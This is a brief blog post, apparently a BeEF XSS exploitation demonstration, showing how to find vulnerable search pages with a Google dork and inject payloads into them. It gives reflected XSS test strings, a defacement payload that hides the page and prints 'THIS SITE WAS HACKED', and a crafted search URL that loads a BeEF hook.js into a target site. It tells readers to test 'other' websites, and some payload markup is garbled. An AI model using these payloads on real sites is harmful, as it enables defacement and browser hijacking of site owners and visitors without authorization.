Beef XSS Exploitation Demonstration

[inurl:.com/search.asp]

1. Test other website and input the code

TEST

or alert(‘x’); on search box.
2. The result was show a heading title, but I’m not sure, then
3. Check the selection source to make sure it’s not a bold
4. Check if the query was processed by server without filtering

Test:
a. alert(‘x’);
b. document.body.innerHTML=”body{visibility:hidden;}

THIS SITE WAS HACKED

“;
c.

TEST

Beef XSS Query: Vulnerable XSS
http://127.0.0.1:3000/hook.js

Sample of the XSS page:

http://www.xss_vulnerable_website/search.asp?keyword=http://127.0.0.1:3000/hook.js&x=0&y=0

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this:

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…

TEST

THIS SITE WAS HACKED

TEST

Share this:

Like this:

Related

Leave a Reply Cancel reply